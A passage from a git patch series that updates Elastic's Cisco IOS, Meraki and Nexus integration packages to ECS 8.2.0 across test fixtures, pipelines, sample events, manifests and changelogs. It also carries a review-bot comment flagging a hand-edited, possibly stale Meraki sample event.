"ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "deny", @@ -122,7 +122,7 @@ "ip": "255.255.255.255" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "deny", @@ -184,7 +184,7 @@ "port": 22 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "allow", @@ -247,7 +247,7 @@ "port": 15600 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "deny", @@ -301,7 +301,7 @@ "ip": "192.168.100.2" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "deny", 
@@ -359,7 +359,7 @@ "port": 15600 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "deny", @@ -408,7 +408,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -444,7 +444,7 @@ "port": 15600 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "deny", @@ -511,7 +511,7 @@ "port": 80 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "deny", @@ -560,7 +560,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -595,7 +595,7 @@ "ip": "192.168.100.1" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "deny", @@ -665,7 +665,7 @@ "port": 80 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "deny", @@ -718,7 +718,7 @@ "port": 22 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -771,7 +771,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -830,7 +830,7 @@ "ip": "10.3.66.3" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "multicast-join", @@ -890,7 +890,7 @@ "ip": "10.3.66.3" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "multicast-join", @@ -936,7 +936,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -966,7 +966,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", diff --git a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-date-format-tzoffset.log-expected.json b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-date-format-tzoffset.log-expected.json index acc9c56efd9..eb96b9d18b6 100644 --- a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-date-format-tzoffset.log-expected.json 
+++ b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-date-format-tzoffset.log-expected.json @@ -8,7 +8,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -39,7 +39,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", diff --git a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-date-format.log-expected.json b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-date-format.log-expected.json index 1d815882f8f..77812b4f68b 100644 --- a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-date-format.log-expected.json +++ b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-date-format.log-expected.json @@ -8,7 +8,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -39,7 +39,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -70,7 +70,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -101,7 +101,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -132,7 +132,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -163,7 +163,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -194,7 +194,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -225,7 +225,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -256,7 +256,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -287,7 +287,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -318,7 +318,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", 
@@ -349,7 +349,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -380,7 +380,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -411,7 +411,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -442,7 +442,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -473,7 +473,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -504,7 +504,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -535,7 +535,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", diff --git a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-syslog.log-expected.json b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-syslog.log-expected.json index 4cc8b693e4a..fc5d62f57cd 100644 --- a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-syslog.log-expected.json +++ b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-syslog.log-expected.json @@ -8,7 +8,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -38,7 +38,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", @@ -72,7 +72,7 @@ "ip": "10.100.8.34" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "deny", @@ -123,7 +123,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "category": "network", diff --git a/packages/cisco_ios/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_ios/data_stream/log/elasticsearch/ingest_pipeline/default.yml index d924289d5b4..f22c5037ac6 100644 --- a/packages/cisco_ios/data_stream/log/elasticsearch/ingest_pipeline/default.yml 
+++ b/packages/cisco_ios/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -4,7 +4,7 @@ description: Pipeline for Cisco IOS logs. processors: - set: field: ecs.version - value: '8.0.0' + value: '8.2.0' - set: field: event.category value: network diff --git a/packages/cisco_ios/data_stream/log/sample_event.json b/packages/cisco_ios/data_stream/log/sample_event.json index 2cfc1f7387f..4278f6958d6 100644 --- a/packages/cisco_ios/data_stream/log/sample_event.json +++ b/packages/cisco_ios/data_stream/log/sample_event.json @@ -23,7 +23,7 @@ "ip": "224.0.0.22" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "18c952cc-80e4-43a5-afa9-79993d53ebf6", diff --git a/packages/cisco_ios/docs/README.md b/packages/cisco_ios/docs/README.md index 83e46f90b33..8d61d905996 100644 --- a/packages/cisco_ios/docs/README.md +++ b/packages/cisco_ios/docs/README.md @@ -35,7 +35,7 @@ An example event for `log` looks as following: "ip": "224.0.0.22" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "elastic_agent": { "id": "18c952cc-80e4-43a5-afa9-79993d53ebf6", diff --git a/packages/cisco_ios/manifest.yml b/packages/cisco_ios/manifest.yml index b008474f693..29446657265 100644 --- a/packages/cisco_ios/manifest.yml +++ b/packages/cisco_ios/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: cisco_ios title: Cisco IOS -version: 1.4.1 +version: 1.5.0 license: basic description: Collect logs from Cisco IOS with Elastic Agent. type: integration From 3761a98ef5e4f4d7b7448eb06c84f1190fdf4691 Mon Sep 17 00:00:00 2001 
From: Taylor Swanson Date: Wed, 23 Feb 2022 11:49:44 -0600 Subject: [PATCH 14/23] Update cisco_meraki to ECS 8.2 --- packages/cisco_meraki/_dev/build/build.yml | 2 +- packages/cisco_meraki/changelog.yml | 5 + .../pipeline/test-generated.log-expected.json | 200 +++++++++--------- .../elasticsearch/ingest_pipeline/default.yml | 2 +- .../data_stream/log/sample_event.json | 2 +- packages/cisco_meraki/docs/README.md | 2 +- packages/cisco_meraki/manifest.yml | 2 +- 7 files changed, 110 insertions(+), 105 deletions(-) diff --git a/packages/cisco_meraki/_dev/build/build.yml b/packages/cisco_meraki/_dev/build/build.yml index 809e76063e9..d61527283ec 100644 --- a/packages/cisco_meraki/_dev/build/build.yml +++ b/packages/cisco_meraki/_dev/build/build.yml @@ -1,3 +1,3 @@ dependencies: ecs: - reference: git@8.0 + reference: git@8.2 diff --git a/packages/cisco_meraki/changelog.yml b/packages/cisco_meraki/changelog.yml index aa9069cea34..8460acf2706 100644 --- a/packages/cisco_meraki/changelog.yml +++ b/packages/cisco_meraki/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.5.0" + changes: + - description: Update to ECS 8.2.0 + type: enhancement + link: https://github.com/elastic/integrations/pull/xxxx - version: "0.4.0" changes: - description: Update to ECS 8.0.0 diff --git a/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json b/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json index 521eb1b1ba5..213f16f19ce 100644 --- a/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/cisco_meraki/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json @@ -2,7 +2,7 @@ "expected": [ { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402787257Z" @@ -14,7 +14,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402790126Z" 
@@ -26,7 +26,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402791078Z" @@ -38,7 +38,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402791945Z" @@ -50,7 +50,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402792809Z" @@ -62,7 +62,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402793701Z" @@ -74,7 +74,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402797371Z" @@ -86,7 +86,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402798420Z" @@ -98,7 +98,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402799284Z" @@ -110,7 +110,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402800146Z" @@ -122,7 +122,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402801009Z" @@ -134,7 +134,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402802103Z" @@ -146,7 +146,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402802989Z" @@ -158,7 +158,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402803848Z" @@ -170,7 +170,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402804715Z" @@ -182,7 +182,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402805575Z" 
@@ -194,7 +194,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402806636Z" @@ -206,7 +206,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402807497Z" @@ -218,7 +218,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402808365Z" @@ -230,7 +230,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402809273Z" @@ -242,7 +242,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402810162Z" @@ -254,7 +254,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402811026Z" @@ -266,7 +266,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402811950Z" @@ -278,7 +278,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402812929Z" @@ -290,7 +290,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402813796Z" @@ -302,7 +302,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402814698Z" @@ -314,7 +314,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402815606Z" @@ -326,7 +326,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402816477Z" @@ -338,7 +338,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402817329Z" @@ -350,7 +350,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402818188Z" 
@@ -362,7 +362,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402819089Z" @@ -374,7 +374,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402819955Z" @@ -386,7 +386,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402820928Z" @@ -398,7 +398,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402821803Z" @@ -410,7 +410,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402822774Z" @@ -422,7 +422,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402823636Z" @@ -434,7 +434,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402824495Z" @@ -446,7 +446,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402859624Z" @@ -458,7 +458,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402860969Z" @@ -470,7 +470,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402861866Z" @@ -482,7 +482,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402862738Z" @@ -494,7 +494,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402863582Z" @@ -506,7 +506,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402864441Z" @@ -518,7 +518,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402865373Z" 
@@ -530,7 +530,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402866225Z" @@ -542,7 +542,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402867073Z" @@ -554,7 +554,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402867921Z" @@ -566,7 +566,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402868775Z" @@ -578,7 +578,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402869648Z" @@ -590,7 +590,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402870491Z" @@ -602,7 +602,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402871577Z" @@ -614,7 +614,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402872431Z" @@ -626,7 +626,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402873284Z" @@ -638,7 +638,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402874155Z" @@ -650,7 +650,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402875353Z" @@ -662,7 +662,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402876192Z" @@ -674,7 +674,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402877035Z" @@ -686,7 +686,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402877879Z" 
@@ -698,7 +698,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402878756Z" @@ -710,7 +710,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402879608Z" @@ -722,7 +722,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402880460Z" @@ -734,7 +734,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402881305Z" @@ -746,7 +746,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402882160Z" @@ -758,7 +758,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402883012Z" @@ -770,7 +770,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402883878Z" @@ -782,7 +782,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402884730Z" @@ -794,7 +794,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402885579Z" @@ -806,7 +806,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402886438Z" @@ -818,7 +818,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402887291Z" @@ -830,7 +830,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402888137Z" @@ -842,7 +842,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402888988Z" @@ -854,7 +854,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402889888Z" 
@@ -866,7 +866,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402890747Z" @@ -878,7 +878,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402891635Z" @@ -890,7 +890,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402892676Z" @@ -902,7 +902,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402897820Z" @@ -914,7 +914,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402900543Z" @@ -926,7 +926,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402902009Z" @@ -938,7 +938,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402903304Z" @@ -950,7 +950,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402904182Z" @@ -962,7 +962,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402905133Z" @@ -974,7 +974,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402906346Z" @@ -986,7 +986,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402907198Z" @@ -998,7 +998,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402908149Z" @@ -1010,7 +1010,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402909011Z" @@ -1022,7 +1022,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402909867Z" 
@@ -1034,7 +1034,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402910758Z" @@ -1046,7 +1046,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402911649Z" @@ -1058,7 +1058,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402912501Z" @@ -1070,7 +1070,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402913354Z" @@ -1082,7 +1082,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402914214Z" @@ -1094,7 +1094,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402915077Z" @@ -1106,7 +1106,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402915952Z" @@ -1118,7 +1118,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402916820Z" @@ -1130,7 +1130,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402917680Z" @@ -1142,7 +1142,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402918551Z" @@ -1154,7 +1154,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402919417Z" @@ -1166,7 +1166,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402920282Z" @@ -1178,7 +1178,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402921147Z" @@ -1190,7 +1190,7 @@ }, { "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "ingested": "2022-01-25T12:05:18.402922010Z" 
diff --git a/packages/cisco_meraki/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_meraki/data_stream/log/elasticsearch/ingest_pipeline/default.yml index a932e4cc8eb..546c92efd60 100644 --- a/packages/cisco_meraki/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_meraki/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -8,7 +8,7 @@ processors: value: '{{_ingest.timestamp}}' - set: field: ecs.version - value: '8.0.0' + value: '8.2.0' # User agent - user_agent: field: user_agent.original diff --git a/packages/cisco_meraki/data_stream/log/sample_event.json b/packages/cisco_meraki/data_stream/log/sample_event.json index d8c468fb765..e3cebb197bf 100644 --- a/packages/cisco_meraki/data_stream/log/sample_event.json +++ b/packages/cisco_meraki/data_stream/log/sample_event.json @@ -19,7 +19,7 @@ "port": 5293 }, "ecs": { - "version": "1.12.0" + "version": "8.2.0" }, "elastic_agent": { "id": "4e3f135a-d5f9-40b6-ae01-2c834ecbead0", diff --git a/packages/cisco_meraki/docs/README.md b/packages/cisco_meraki/docs/README.md index 17f05ec1da9..7a2a8ae3319 100644 --- a/packages/cisco_meraki/docs/README.md +++ b/packages/cisco_meraki/docs/README.md @@ -35,7 +35,7 @@ An example event for `log` looks as following: "port": 5293 }, "ecs": { - "version": "1.12.0" + "version": "8.2.0" }, "elastic_agent": { "id": "4e3f135a-d5f9-40b6-ae01-2c834ecbead0", diff --git a/packages/cisco_meraki/manifest.yml b/packages/cisco_meraki/manifest.yml index b97e69619e4..94b3cdd958d 100644 --- a/packages/cisco_meraki/manifest.yml +++ b/packages/cisco_meraki/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: cisco_meraki title: Cisco Meraki -version: 0.4.0 +version: 0.5.0 license: basic description: Collect logs from Cisco Meraki with Elastic Agent. type: integration From 81ee028493491699d661d491a68009c3259b7310 Mon Sep 17 00:00:00 2001 
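Review bot: In the cisco_meraki `sample_event.json` hunk, `ecs.version` jumps from `1.12.0` straight to `8.2.0`, which suggests the sample was already stale and has now been edited by hand rather than regenerated; the package changelog records an earlier update to ECS 8.0.0 that this file apparently missed. The other fields of the sample may therefore not match what the current pipeline emits. Regenerating the sample from a system test run, and rebuilding the README from it, would keep the documented event accurate for anyone writing detections against it. The cisco_meraki README hunk and the cisco_nexus `sample_event.json` and README hunks show the same `1.12.0` to `8.2.0` jump, and the JSON object continues outside each hunk.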
From: Taylor Swanson Date: Wed, 23 Feb 2022 11:55:21 -0600 Subject: [PATCH 15/23] Update cisco_nexus to ECS 8.2 --- packages/cisco_nexus/_dev/build/build.yml | 2 +- packages/cisco_nexus/changelog.yml | 5 +++++ .../log/_dev/test/pipeline/test-nexus.log-expected.json | 2 +- .../log/elasticsearch/ingest_pipeline/default.yml | 2 +- packages/cisco_nexus/data_stream/log/sample_event.json | 2 +- packages/cisco_nexus/docs/README.md | 2 +- packages/cisco_nexus/manifest.yml | 2 +- 7 files changed, 11 insertions(+), 6 deletions(-) diff --git a/packages/cisco_nexus/_dev/build/build.yml b/packages/cisco_nexus/_dev/build/build.yml index 809e76063e9..d61527283ec 100644 --- a/packages/cisco_nexus/_dev/build/build.yml +++ b/packages/cisco_nexus/_dev/build/build.yml @@ -1,3 +1,3 @@ dependencies: ecs: - reference: git@8.0 + reference: git@8.2 diff --git a/packages/cisco_nexus/changelog.yml b/packages/cisco_nexus/changelog.yml index e5d2ea814b2..c6ebd801fb9 100644 --- a/packages/cisco_nexus/changelog.yml +++ b/packages/cisco_nexus/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.5.0" + changes: + - description: Update to ECS 8.2.0 + type: enhancement + link: https://github.com/elastic/integrations/pull/xxxx - version: "0.4.0" changes: - description: Update to ECS 8.0.0 diff --git a/packages/cisco_nexus/data_stream/log/_dev/test/pipeline/test-nexus.log-expected.json b/packages/cisco_nexus/data_stream/log/_dev/test/pipeline/test-nexus.log-expected.json index 518f3618e94..5342e9a5e2b 100644 --- a/packages/cisco_nexus/data_stream/log/_dev/test/pipeline/test-nexus.log-expected.json +++ b/packages/cisco_nexus/data_stream/log/_dev/test/pipeline/test-nexus.log-expected.json @@ -2,7 +2,7 